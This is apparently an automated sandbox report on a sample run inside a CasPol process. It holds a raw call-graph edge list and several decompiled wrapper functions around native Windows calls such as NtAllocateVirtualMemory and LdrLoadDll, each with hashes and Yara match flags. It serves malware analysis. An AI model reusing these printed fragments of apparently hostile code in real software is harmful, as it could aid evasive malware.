34215 41f08d 34214->34215 34216 41eea3 LdrLoadDll 34215->34216 34217 41f099 34216->34217 34218 41eea3 LdrLoadDll 34217->34218 34219 41f0a2 34218->34219 34220 41eea3 LdrLoadDll 34219->34220 34221 41f0ab 34220->34221 34222 41eea3 LdrLoadDll 34221->34222 34223 41f0b4 34222->34223 34224 41eea3 LdrLoadDll 34223->34224 34225 41f0bd 34224->34225 34226 41eea3 LdrLoadDll 34225->34226 34227 41f0c6 34226->34227 34228 41eea3 LdrLoadDll 34227->34228 34229 41f0d2 34228->34229 34230 41eea3 LdrLoadDll 34229->34230 34231 41f0db 34230->34231 34232 41eea3 LdrLoadDll 34231->34232 34233 41f0e4 34232->34233 34234 41eea3 LdrLoadDll 34233->34234 34235 41f0ed 34234->34235 34236 41eea3 LdrLoadDll 34235->34236 34237 41f0f6 34236->34237 34238 41eea3 LdrLoadDll 34237->34238 34239 41f0ff 34238->34239 34240 41eea3 LdrLoadDll 34239->34240 34241 41f10b 34240->34241 34242 41eea3 LdrLoadDll 34241->34242 34243 41f114 34242->34243 34244 41eea3 LdrLoadDll 34243->34244 34245 41f11d 34244->34245 34246 41eea3 LdrLoadDll 34245->34246 34247 41f126 34246->34247 34248 41eea3 LdrLoadDll 34247->34248 34249 41f12f 34248->34249 34250 41eea3 LdrLoadDll 34249->34250 34251 41f138 34250->34251 34252 41eea3 LdrLoadDll 34251->34252 34253 41f144 34252->34253 34254 41eea3 LdrLoadDll 34253->34254 34255 41f14d 34254->34255 34256 41eea3 LdrLoadDll 34255->34256 34257 41f156 34256->34257 34258 41eea3 LdrLoadDll 34257->34258 34259 41f15f 34258->34259 34260 41eea3 LdrLoadDll 34259->34260 34261 41f168 34260->34261 34262 41eea3 LdrLoadDll 34261->34262 34263 41f171 34262->34263 34264 41eea3 LdrLoadDll 34263->34264 34265 41f17d 34264->34265 34266 41eea3 LdrLoadDll 34265->34266 34267 41f186 34266->34267 34268 41eea3 LdrLoadDll 34267->34268 34269 41f18f 34268->34269 34269->34050 34271 41f223 LdrLoadDll 34270->34271 34272 41e12f 34271->34272 34302 13f9860 LdrInitializeThunk 34272->34302 34273 41e146 34273->34052 34275->34047 34277 41f223 LdrLoadDll 34276->34277 34278 41e7af NtAllocateVirtualMemory 34277->34278 34278->34147 34280 4212e3 34279->34280 34281 4212e9 34279->34281 34280->34153 34282 420233 2 API calls 34281->34282 34283 42130f 34282->34283 34283->34153 34285 421373 34284->34285 34286 4213d0 34285->34286 34287 420233 2 API calls 34285->34287 34286->34161 34288 4213ad 34287->34288 34289 420153 2 API calls 34288->34289 34289->34286 34290->34157 34291->34171 34292->34173 34293->34175 34294->34178 34295->34150 34297 41eebe 34296->34297 34298 4195b3 LdrLoadDll 34297->34298 34300 41eede 34298->34300 34299 41ef92 34299->34195 34300->34299 34301 4195b3 LdrLoadDll 34300->34301 34301->34299 34302->34273 34304 13f968f LdrInitializeThunk 34303->34304 34305 13f9681 34303->34305 34304->34056 34305->34056 34307 41e8df RtlFreeHeap 34306->34307 34308 41f223 LdrLoadDll 34306->34308 34307->34060 34308->34307 34310 4093f3 34309->34310 34311 4093ee 34309->34311 34312 4200d3 2 API calls 34310->34312 34311->33991 34313 409418 34312->34313 34314 40947b 34313->34314 34315 41e113 2 API calls 34313->34315 34316 409481 34313->34316 34320 4200d3 2 API calls 34313->34320 34325 41e813 34313->34325 34314->33991 34315->34313 34318 4094a7 34316->34318 34319 41e813 2 API calls 34316->34319 34318->33991 34321 409498 34319->34321 34320->34313 34321->33991 34323 4096c1 34322->34323 34324 41e813 2 API calls 34322->34324 34323->33952 34324->34323 34326 41f223 LdrLoadDll 34325->34326 34327 41e82f 34326->34327 34330 13f96e0 LdrInitializeThunk 34327->34330 34328 41e846 34328->34313 34330->34328 34332 41f8b6 34331->34332 34333 40ced3 LdrLoadDll 34332->34333 34334 40bd84 34333->34334 34334->33960 34336 40d246 34335->34336 34338 40d2c3 34336->34338 34347 41dee3 LdrLoadDll 34336->34347 34338->33965 34340 41ea42 LookupPrivilegeValueW 34339->34340 34341 41f223 LdrLoadDll 34339->34341 34340->33970 34341->34340 34343 41e4cf 34342->34343 34344 41f223 LdrLoadDll 34342->34344 34348 13f9910 LdrInitializeThunk 34343->34348 34344->34343 34345 41e4ee 34345->33971 34347->34338 34348->34345 34350 40d3ca 34349->34350 34351 40d223 LdrLoadDll 34350->34351 34352 40d42d 34351->34352 34352->33922 34354 40ff7d 34353->34354 34362 410033 34353->34362 34355 40d223 LdrLoadDll 34354->34355 34356 40ff9f 34355->34356 34363 41e193 34356->34363 34358 40ffe1 34359 410027 34358->34359 34367 41e1d3 34358->34367 34361 41e6e3 2 API calls 34359->34361 34361->34362 34362->33925 34362->33926 34364 41e1a9 34363->34364 34365 41f223 LdrLoadDll 34364->34365 34366 41e1af 34365->34366 34366->34358 34368 41e1ef 34367->34368 34369 41f223 LdrLoadDll 34367->34369 34372 13f9fe0 LdrInitializeThunk 34368->34372 34369->34368 34370 41e206 34370->34359 34372->34370 34374 40dd44 34373->34374 34375 40d3a3 LdrLoadDll 34374->34375 34376 40ddb5 34375->34376 34409 40d023 34376->34409 34378 40e02c 34378->33939 34379 40dddb 34379->34378 34418 418ad3 34379->34418 34381 40de20 34381->34378 34421 40a013 34381->34421 34383 40de64 34383->34378 34443 41e753 34383->34443 34387 40deba 34388 40dec1 34387->34388 34455 41e263 34387->34455 34389 420153 2 API calls 34388->34389 34391 40dece 34389->34391 34391->33939 34393 40df0b 34394 420153 2 API calls 34393->34394 34395 40df12 34394->34395 34395->33939 34396 40df1b 34397 410123 3 API calls 34396->34397 34398 40df8f 34397->34398 34398->34388 34399 40df9a 34398->34399 34400 420153 2 API calls 34399->34400 34401 40dfbe 34400->34401 34461 41e2b3 34401->34461 34404 41e263 2 API calls 34405 40dff9 34404->34405 34405->34378 34466 41e073 34405->34466 34408 41e903 2 API calls 34408->34378 34410 40d030 34409->34410 34411 40d034 34409->34411 34410->34379 34412 40d04d 34411->34412 34413 40d07f 34411->34413 34471 41df23 LdrLoadDll 34412->34471 34472 41df23 LdrLoadDll 34413->34472 34415 40d090 34415->34379 34417 40d06f 34417->34379 34419 410123 3 API calls 34418->34419 34420 418af9 34418->34420 34419->34420 34420->34381 34473 40a243 34421->34473 34423 40a239 34423->34383 34424 40a031 34424->34423 34425 4093e3 4 API calls 34424->34425 34426 40a10f 34424->34426 34436 40a06f 34425->34436 34426->34423 34427 40a1ef 34426->34427 34428 4093e3 4 API calls 34426->34428 34427->34423 34520 410393 10 API calls 34427->34520 34440 40a14c 34428->34440 34430 40a203 34430->34423 34521 410393 10 API calls 34430->34521 34432 40a219 34432->34423 34522 410393 10 API calls 34432->34522 34434 40a22f 34434->34383 34436->34426 34437 40a105 34436->34437 34487 409cf3 34436->34487 34438 4096a3 2 API calls 34437->34438 34438->34426 34439 409cf3 14 API calls 34439->34440 34440->34427 34440->34439 34441 40a1e5 34440->34441 34442 4096a3 2 API calls 34441->34442 34442->34427 34444 41f223 LdrLoadDll 34443->34444 34445 41e76f 34444->34445 34604 13f98f0 LdrInitializeThunk 34445->34604 34446 40de9b 34448 410123 34446->34448 34449 410140 34448->34449 34605 41e213 34449->34605 34452 410188 34452->34387 34453 41e263 2 API calls 34454 4101b1 34453->34454 34454->34387 34456 41e269 34455->34456 34457 41f223 LdrLoadDll 34456->34457 34458 41e27f 34457->34458 34611 13f9780 LdrInitializeThunk 34458->34611 34459 40defe 34459->34393 34459->34396 34462 41f223 LdrLoadDll 34461->34462 34463 41e2cf 34462->34463 34612 13f97a0 LdrInitializeThunk 34463->34612 34464 40dfd2 34464->34404 34467 41f223 LdrLoadDll 34466->34467 34468 41e08f 34467->34468 34613 13f9a20 LdrInitializeThunk 34468->34613 34469 40e025 34469->34408 34471->34417 34472->34415 34474 40a26a 34473->34474 34475 4093e3 4 API calls 34474->34475 34482 40a4cf 34474->34482 34476 40a2bd 34475->34476 34477 4096a3 2 API calls 34476->34477 34476->34482 34478 40a34c 34477->34478 34479 4093e3 4 API calls 34478->34479 34478->34482 34480 40a361 34479->34480 34481 4096a3 2 API calls 34480->34481 34480->34482 34485 40a3c1 34481->34485 34482->34424 34483 4093e3 4 API calls 34483->34485 34484 409cf3 14 API calls 34484->34485 34485->34482 34485->34483 34485->34484 34486 4096a3 2 API calls 34485->34486 34486->34485 34488 409d18 34487->34488 34523 41df63 34488->34523 34491 409d6c 34491->34436 34492 409ded 34556 410273 LdrLoadDll NtClose 34492->34556 34493 41e153 2 API calls 34494 409d90 34493->34494 34494->34492 34496 409d9b 34494->34496 34498 409e19 34496->34498 34526 40e043 34496->34526 34497 409e08 34499 409e25 34497->34499 34500 409e0f 34497->34500 34498->34436 34557 41dfe3 LdrLoadDll 34499->34557 34502 41e6e3 2 API calls 34500->34502 34502->34498 34503 409db5 34503->34498 34546 409b23 34503->34546 34506 409e50 34507 40e043 5 API calls 34506->34507 34509 409e70 34507->34509 34509->34498 34558 41e013 LdrLoadDll 34509->34558 34511 409e95 34559 41e0a3 LdrLoadDll 34511->34559 34513 409eaf 34514 41e073 2 API calls 34513->34514 34515 409ebe 34514->34515 34516 41e6e3 2 API calls 34515->34516 34517 409ec8 34516->34517 34560 4098f3 34517->34560 34519 409edc 34519->34436 34520->34430 34521->34432 34522->34434 34524 409d62 34523->34524 34525 41f223 LdrLoadDll 34523->34525 34524->34491 34524->34492 34524->34493 34525->34524 34527 40e071 34526->34527 34528 410123 3 API calls 34527->34528 34529 40e0d3 34528->34529 34530 40e11c 34529->34530 34531 41e263 2 API calls 34529->34531 34530->34503 34532 40e0fe 34531->34532 34533 40e108 34532->34533 34537 40e128 34532->34537 34534 41e2b3 2 API calls 34533->34534 34535 40e112 34534->34535 34536 41e6e3 2 API calls 34535->34536 34536->34530 34538 40e1b2 34537->34538 34539 40e195 34537->34539 34540 41e2b3 2 API calls 34538->34540 34541 41e6e3 2 API calls 34539->34541 34542 40e1c1 34540->34542 34543 40e19f 34541->34543 34544 41e6e3 2 API calls 34542->34544 34543->34503 34545 40e1cb 34544->34545 34545->34503 34547 409b39 34546->34547 34555 409cc4 34547->34555 34576 4096e3 34547->34576 34549 409c38 34550 4098f3 11 API calls 34549->34550 34549->34555 34551 409c66 34550->34551 34552 41e153 2 API calls 34551->34552 34551->34555 34553 409c9b 34552->34553 34554 41e753 2 API calls 34553->34554 34553->34555 34554->34555 34555->34436 34556->34497 34557->34506 34558->34511 34559->34513 34561 40991c 34560->34561 34583 409853 34561->34583 34564 41e753 2 API calls 34565 40992f 34564->34565 34565->34564 34566 4099ba 34565->34566 34568 4099b5 34565->34568 34591 4102f3 34565->34591 34566->34519 34567 41e6e3 2 API calls 34569 4099ed 34567->34569 34568->34567 34569->34566 34570 41df63 LdrLoadDll 34569->34570 34571 409a52 34570->34571 34571->34566 34595 41dfa3 34571->34595 34573 409ab6 34573->34566 34574 4191a3 8 API calls 34573->34574 34575 409b0b 34574->34575 34575->34519 34577 4097e2 34576->34577 34578 4096f8 34576->34578 34577->34549 34578->34577 34579 4191a3 8 API calls 34578->34579 34580 409765 34579->34580 34581 420153 2 API calls 34580->34581 34582 40978c 34580->34582 34581->34582 34582->34549 34584 40986d 34583->34584 34585 40ced3 LdrLoadDll 34584->34585 34586 409888 34585->34586 34587 4195b3 LdrLoadDll 34586->34587 34588 4098a0 34587->34588 34589 4098bc 34588->34589 34590 4098a9 PostThreadMessageW 34588->34590 34589->34565 34590->34589 34592 410306 34591->34592 34598 41e0e3 34592->34598 34596 41dfbf 34595->34596 34597 41f223 LdrLoadDll 34595->34597 34596->34573 34597->34596 34599 41f223 LdrLoadDll 34598->34599 34600 41e0ff 34599->34600 34603 13f9840 LdrInitializeThunk 34600->34603 34601 410331 34601->34565 34603->34601 34604->34446 34606 41e22f 34605->34606 34607 41f223 LdrLoadDll 34605->34607 34610 13f99a0 LdrInitializeThunk 34606->34610 34607->34606 34608 410181 34608->34452 34608->34453 34610->34608 34611->34459 34612->34464 34613->34469 34616 13f9540 LdrInitializeThunk

                                                                        Executed Functions

                                                                        Function 0041E6DE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 41e6de-41e70c call 41f223 NtClose
                                                                        C-Code - Quality: 75%
                                                                        			E0041E6DE(intOrPtr _a8, void* _a12) {
				long _t9;

				_pop(ds);
				_t6 = _a8;
				E0041F223( *((intOrPtr*)(_a8 + 0x14)), _t6, _t6 + 0xa7c,  *((intOrPtr*)(_a8 + 0x14)), 0, 0x2c);
				_t9 = NtClose(_a12); // executed
				return _t9;
			}




                                                                        0x0041e6de
                                                                        0x0041e6e6
                                                                        0x0041e6fa
                                                                        0x0041e708
                                                                        0x0041e70c

                                                                        APIs
                                                                        • NtClose.NTDLL(004102D8,00000000,?,004102D8,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E708
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID: <sxU
                                                                        • API String ID: 3535843008-837359753
                                                                        • Opcode ID: eabc21bdcd6ea92364193cc9ee7acf91f5b54f9ce4ff6891967a2d9bc80cbf6c
                                                                        • Instruction ID: e3c2678bfc3d18e5bdd51e0d2f0159d6e95c5575b293d6a9d07cabfcab0a19f7
                                                                        • Opcode Fuzzy Hash: eabc21bdcd6ea92364193cc9ee7acf91f5b54f9ce4ff6891967a2d9bc80cbf6c
                                                                        • Instruction Fuzzy Hash: 55E012766042146BD710EBD8EC45FD77B68DF48764F018495BA1D9B742C171EA0187E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040CED3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 286 40ced3-40cefc call 420ef3 289 40cf02-40cf10 call 421413 286->289 290 40cefe-40cf01 286->290 293 40cf20-40cf31 call 41f793 289->293 294 40cf12-40cf1d call 421693 289->294 299 40cf33-40cf47 LdrLoadDll 293->299 300 40cf4a-40cf4d 293->300 294->293 299->300
                                                                        C-Code - Quality: 100%
                                                                        			E0040CED3(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00420EF3( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E00421413(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00421693( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F793(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                        0x0040ceef
                                                                        0x0040cef2
                                                                        0x0040cef7
                                                                        0x0040cefc
                                                                        0x0040cf06
                                                                        0x0040cf0b
                                                                        0x0040cf0e
                                                                        0x0040cf10
                                                                        0x0040cf18
                                                                        0x0040cf1d
                                                                        0x0040cf1d
                                                                        0x0040cf24
                                                                        0x0040cf2c
                                                                        0x0040cf2f
                                                                        0x0040cf31
                                                                        0x0040cf45
                                                                        0x00000000
                                                                        0x0040cf47
                                                                        0x0040cf4d
                                                                        0x0040cf01
                                                                        0x0040cf01
                                                                        0x0040cf01

                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF45
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 51f88520c29db4d47c07e15d5e3de82b87644f0aaa3e216130af3a830edd7316
                                                                        • Instruction ID: 14337de2c8164343ddf43ba7c008c11142b32e495126f731bf4d8c427d14e85f
                                                                        • Opcode Fuzzy Hash: 51f88520c29db4d47c07e15d5e3de82b87644f0aaa3e216130af3a830edd7316
                                                                        • Instruction Fuzzy Hash: DB0175B1E4010EA7DF10DBE5DC86FDEB378AB14308F0041A6F908A7280F634EB448755
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041E78D Relevance: 1.5, APIs: 1, Instructions: 47memorynativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 301 41e78d-41e791 302 41e793-41e7d0 call 41f223 NtAllocateVirtualMemory 301->302 303 41e7f7-41e807 301->303 305 41e80a-41e80c 303->305 307 41e808 call 13f9a00 303->307 307->305
                                                                        C-Code - Quality: 58%
                                                                        			E0041E78D(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				asm("daa");
				asm("loope 0x66");
				_t10 = _a4;
				E0041F223( *((intOrPtr*)(_a4 + 0x14)), _t10, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                        0x0041e790
                                                                        0x0041e791
                                                                        0x0041e796
                                                                        0x0041e7aa
                                                                        0x0041e7cc
                                                                        0x0041e7d0

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E7CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: ea6c9640f696ffcbb8ef467a3fd4bd55dd179215d0a24c7b78f8742336ef80f9
                                                                        • Instruction ID: 9eed084d59b35aee01eabfd0b84f505de1ffaf69c883ee217f57e7c7ad5304d3
                                                                        • Opcode Fuzzy Hash: ea6c9640f696ffcbb8ef467a3fd4bd55dd179215d0a24c7b78f8742336ef80f9
                                                                        • Instruction Fuzzy Hash: B60169B6200219ABCB18DF98DC85EEB73ADEF8C314F108519FA5C9B241C631E811CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041E5B3 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 316 41e5b3-41e604 call 41f223 NtCreateFile
                                                                        C-Code - Quality: 100%
                                                                        			E0041E5B3(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F223( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                        0x0041e5c2
                                                                        0x0041e5ca
                                                                        0x0041e600
                                                                        0x0041e604

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E600
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                        • Instruction ID: 349c678bcadd4c2aad84a336dbb19fe8c8e16f703881d3bb26f008437893ce07
                                                                        • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                        • Instruction Fuzzy Hash: 5EF0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018248BA0997241C630E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041E65D Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 319 41e65d-41e6ac call 41f223 NtReadFile
                                                                        APIs
                                                                        • NtReadFile.NTDLL(004194D3,004149A3,FFFFFFFF,00418FB6,00000002,?,004194D3,00000002,00418FB6,FFFFFFFF,004149A3,004194D3,00000002,00000000), ref: 0041E6A8
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 37569995663c40e8c7eafb3225fe40729b80976e86f14d781ad79531e4009e6b
                                                                        • Instruction ID: ae7f0bf4d196d4e2566f87fe891c19ac8d2e709bee0c1b01132405288b5634cf
                                                                        • Opcode Fuzzy Hash: 37569995663c40e8c7eafb3225fe40729b80976e86f14d781ad79531e4009e6b
                                                                        • Instruction Fuzzy Hash: 03F0E7B2200208ABCB14DF99DC84EDB77ADEF8C714F118659BA0D97241C631EC11CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041E663 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 322 41e663-41e679 323 41e67f-41e6ac NtReadFile 322->323 324 41e67a call 41f223 322->324 324->323
                                                                        C-Code - Quality: 37%
                                                                        			E0041E663(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xa74; // 0xa76
				_t27 = _t3;
				E0041F223( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                                        0x0041e672
                                                                        0x0041e672
                                                                        0x0041e67a
                                                                        0x0041e6a8
                                                                        0x0041e6ac

                                                                        APIs
                                                                        • NtReadFile.NTDLL(004194D3,004149A3,FFFFFFFF,00418FB6,00000002,?,004194D3,00000002,00418FB6,FFFFFFFF,004149A3,004194D3,00000002,00000000), ref: 0041E6A8
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                        • Instruction ID: 768f1dcd7fb2369f3f92b11411ed061d62c583105e964bb784e8ecccf354e01b
                                                                        • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                        • Instruction Fuzzy Hash: FDF0FFB2200208ABCB04DF89DC84EEB77ADAF8C714F018248BA0DA7241C630E8118BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041E793 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0041E793(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				E0041F223( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                        0x0041e7aa
                                                                        0x0041e7cc
                                                                        0x0041e7d0

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E7CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                        • Instruction ID: 8a7637670b8b5f5ea7151550ae918a7c7ae5d1151593d8b3a588b182ebfc21d3
                                                                        • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                        • Instruction Fuzzy Hash: F9F01EB6200208ABCB18DF89EC81EEB77ADAF88754F018159BE0897241C630F811CBB4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041E6E3 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0041E6E3(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F223( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                        0x0041e6fa
                                                                        0x0041e708
                                                                        0x0041e70c

                                                                        APIs
                                                                        • NtClose.NTDLL(004102D8,00000000,?,004102D8,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E708
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                        • Instruction ID: c101b25af9ac9ac4ebbb787b08598838618d03c1626203936ca23b9d25103650
                                                                        • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                        • Instruction Fuzzy Hash: FFD01776604214ABD710EBE9EC89FD77BACDF48664F0184A9BA1C5B242C571FA0086E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: cbae780f05d63a31347b744fabc71ef832c30fc6859235cbe8f819f0b307736d
                                                                        • Instruction ID: 6ee5b66d91df4863ca0f65b62923ed621826fe6eeeb6f3d5b0269dc6c73e767e
                                                                        • Opcode Fuzzy Hash: cbae780f05d63a31347b744fabc71ef832c30fc6859235cbe8f819f0b307736d
                                                                        • Instruction Fuzzy Hash: 359002B160500402D14171DA44047460005A7D0341F51C022A5054559EC7F98DD976A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
